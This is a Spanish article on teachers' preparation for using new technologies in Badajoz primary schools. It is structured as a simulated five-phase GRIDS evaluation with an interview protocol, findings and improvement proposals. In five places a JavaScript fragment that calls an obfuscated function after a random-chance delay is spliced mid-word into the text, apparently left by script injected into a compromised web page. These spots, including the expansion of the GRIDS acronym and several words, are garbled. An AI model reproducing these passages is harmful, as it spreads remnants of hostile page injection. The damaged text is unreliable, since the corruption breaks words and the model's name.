LA PREPARACIÓN DEL PROFESORADO EN RELACIÓN A LAS NUEVAS TECNOLOGÍAS

Autora: Milagros García Habernau

INTRODUCCIÓN

          Hoy en día, no se puede negar la importancia que ha cobrado la información como fuente de riqueza para toda la población. La necesidad de convertir esta información en conocimiento depende de las posibilidades de acceder a ella y de la forma en que la trabajemos. En estos momentos, saber leer, escribir y calcular ya no es suficiente para dar respuesta a las necesidades educativas y laborales de cualquier persona, ya que, como explica Abate, M. (2000), la alfabetización ya no es suficiente; incluso en sus formas más domésticas, es necesaria la alfabetización informática. En este sentido, es absurdo no reconocer los beneficios educativos, económicos, sociales y culturales de las Tecnologías de la Información y la Comunicación.

            Como explica Suárez (1998), la sociedad de la información ofrecerá nuevas oportunidades y permitirá que los ciudadanos asuman un papel más activo en la sociedad. A pesar de todo, una diferencia creciente entre los pobres y ricos en información puede conllevar tensiones sociales. Es por todo esto que se debería proporcionar acceso, con espíritu democrático, a toda la información que se publique, ofrecer oportunidades de educación permanente, asegurarnos de que todos los ciudadanos pueden utilizar los ordenadores, tener acceso al equipo y a los sistemas que se requieran y vigilar la identidad cultural en un mundo en rápida evolución.

          Ante el progreso tecnológico, existen consecuencias que el sistema educativo debe asumir, valorar y, consecuentemente, ofrecer respuestas válidas en relación a los cambios socioculturales que se producen y, además, poner en marcha procesos de búsqueda de estrategias para aproximar la práctica educativa a las necesidades sociales que se plantean.

            El presente articulo consiste en una situación simulada basada en el modelo de evaluación formativa GRIDS (Guidelines for Review andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Internal Development in Schools). Existen  múltiples causas (que se exponen en el punto de recogida de información) que  influyen en la integración de las nuevas tecnologías, pero, en este artículo, en el factor q nos vamos a centrar va a ser en la preparación del profesorado y, dependiendo de los resultados, si son positivos o negativos, se procederá siempre con la meta de buscar opciones de mejoras que permitan obtener todas las ventajas que estos medios nos ofrecen.

 

          1ª FASE DE LA EVALUACIÓN.- RECOGIDA DE  INFORMACIÓN DEL OBJETO DE EVALUACIÓN: POCA PREPARACIÓN DEL PROFESORADO

          Son muchos los inconvenientes que influyen en la introducción de las nuevas tecnologías. Entre ellos nombro los siguientes:

-     Gran habilidad de los jóvenes en el manejo técnico: lo manejan mejor que los profesores, que, en  muchas ocasiones, pierden autoridad por su poca seguridad en la materia.

-          No contar con el apoyo de profesionales tecnológicos.

-          Barreras entre la educación formal y no formal.

-          Mal equipamiento de los centros: hay una mala gestión de los fondos.

-          Se hace un gran gasto inicial para poco rendimiento académico.

-          Mejora en los aprendizajes académicos y ayuda en los contenidos de los programas.

-          Repensar el currículo desde la cultura y las nuevas tecnologías audiovisuales.

-          Organización de los contextos de Enseñanza-Aprendizaje.

-          Necesidad de la formación del profesorado.

-          Poca relación entre las asignaturas y los trabajos que se hacen con el ordenador.

-          Hay poca motivación por parte del profesorado.

-          La Administración organiza pocos cursos preparatorios para el profesorado.

-          El uso del ordenador mal planificado favorece el aislamiento en los alumnos, dificultandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el trabajo en equipo.

-          La Administración no dedica suficientes recursos humanos y materiales.

-          Hay demasiadas averías que caen en el olvido, dandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando como resultado la disminución del número de equipos.

 

           2ª FASE.- COSTRUCCIÓN O SELECCIÓN DE INSTRUMENTOS 

          Nos vamos a centrar en uno de los inconvenientes que hemos nombrado anteriormente y es la POCA PREPARACIÓN DEL PROFESORADO, desde su formación hasta su puesta en práctica.

           La formación del profesorado, según Escudero, se basa en varios pilares:

-          Del conocimiento Pedagógico: su construcción y utilización en la mejora de la enseñanza, vinculandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el conocimiento teórico sistemático con los saberes  prácticos y experiencias del profesorado.

-          Del modelo de escuela como organización critica, autorrenovadora y producto de la participación activa y consciente de sus miembros.

-          Del profesorado y su formación como investigador que, en colaboración con otros profesores, reflexiona no solo  sobre las formas y procedimientos de la enseñanza, sino también sobre los valores que transmite.

-          De las políticas educativas y de los sistemas de apoyo a las escuelas y profesores, con el fin de crear unas condiciones de ambiente propicias al impulso de renovación de los centros.

            Por lo tanto, hablar de formación del profesorado se debe enfocar desde un trabajo individual que dura toda la vida, como fuente de reciclamiento continuo, personal y profesional y, a la vez, como un trabajo en equipo junto a otros profesionales que nos ayudarán a constituir grupos que trabajen para la mejora de la educación, enriqueciendo así nuestra labor educativa .

           En este caso, para analizar este factor, se utiliza una entrevista personal a diferentes profesores, que pertenecen a diferentes centros de Educación de Badajoz. Para elaborar la entrevista he tomado como modelo los pasos de Bisquerra (1989) como:

-          Especificar las variables objeto de investigación.

-          Decidir el formato de las preguntas.

-          Especificar hechos, opiniones o actitudes.

           Protocolo de la entrevista:

          La entrevista se hace con unas preguntas dirigidas, pero, a la vez, es abierta, para que cada profesor entrevistado tenga libertad de expresar sus ideas o sugerencias. Las preguntas dirigidas son:

1-   ¿Cree que durante la carrera las asignaturas de NNTT que ha tenido han estado bien planificadas?

2-   ¿Cree necesaria la formación del Profesorado en el uso del ordenador en relación al currículo educativo?

3-  ¿La Administración le ha ofertado algún curso donde le enseñe cómo aplicar el uso del ordenador en su asignatura?

4-   ¿Cree que se siente obligado a usar el ordenador en clase?

5-   ¿El profesorado tiene los suficientes recursos personales y materiales para el uso del ordenador en clase?

6-   ¿Está motivado para ampliar su formación?

7-  ¿Qué soluciones plantea para mejorar la poca preparación del profesorado ante el uso del ordenador en clase?

8-  ¿Cree que hay buenos programas informativos que relacionen los contenidos de la signatura?

 

  3ª FASE.- ANÁLISIS-VALORACIÓN DE LA INFORMACIÓN OBTENIDA

            Después de elegir el instrumento, se escogieron diez centros públicos de Educación Primaria de Badajoz y me dirigí al  director del mismo para acordar día o momento en el que un profesor me pudiera atender para  responder a los cuestionarios relacionados con la integración de nuevas tecnologías. En unos centros me recibió algún profesor que tenía una hora libre; en otros, se me  facilitó el e- mail del centro, por lo que de esta forma se agilizó el trabajo. Una vez recopilado todo el material, empezamos el análisis.

           Esta muestra es mínima para obtener  unos resultados válidos, pero sí nos sirve en nuestro simulacro de evaluación para dar a conocer la metodología que podríamos seguir.

 

 4º FASE. – EMISIÓN DE UN JUICIO DE VALOR

          Una vez analizadas las diferentes encuestas realizadas, las causas principales que he encontrado son:

-          Escasa formación docente durante la carrera universitaria.

-          Las asignaturas que se incluyen en las carreras docentes tienen demasiadas horas teóricas y pocas prácticas.

-          Hay escasa preocupación del profesorado por la formación permanente, pues están pocos incentivados.

-          Hay una gran carencia de conocimientos de las diferentes técnicas, metodologías y de los recursos más indicados para relacionar los programas informativos que hay, con los contenidos que se tienen que impartir.

-          Hay una utilización excesiva de la lección magistral que no favorece la participación de los alumnos en programas informáticos educativos.

-          Los cursos que ofrecen al profesorado, en muchas ocasiones, están dentro de su tiempo libre y en ocasiones lo costean de su dinero.

-          Se hacen pocos seminarios entre el profesorado, por lo que no se puede compartir las experiencias de otros docentes.

 

 5º FASE. -TOMA DE DECISIONES DE MEJORA

          La toma de decisiones para la mejora de la preparación del profesorado se muestra a continuación:

-          Organizar seminarios donde los profesores preocupados por la utilización del ordenador en el aula muestren sus prácticas y resultados docentes.

-          Que la Administración incentive la formación permanente del profesorado.

-          Que la Administración aumente el número de profesores especializados en informática.

-          Que los cursos que se ofrezcan sean más prácticos que teóricos.

-          Que en los programas universitarios de las asignaturas de las NNTT enseñen cómo relacionar los contenidos que hay que enseñar, con los programas educativos que existen en el mercado.

 

BIBLIOGRAFÍA

  • Abate, M. y otros (2000). Informática y pedagogía especial, una propuesta interdisciplinar. II Congreso Iberolatinoamericano de Informática y Educación Especial. Universidad de Córdoba de educación infantil y primaria.
  • Sarramona J. (1990). “Tecnología educativa”: una valoración crítica. Barcelona: CEAC.
  • San Martín A. (1995). La escuela de las tecnologías, Valencia, Universidad de Valencia.
  • Suárez, CL. (1998). Las nuevas tecnologías de la información y la comunicación: Posibilidades y perspectivas para el acceso a la información para personas con discapacidad. Documentación y biblioteca. Nº 87, 43-47.
  • Medina, A y Villar L.M  (1995). Evaluación de programas educativos, centros y profesores, Madrid, Universitas.

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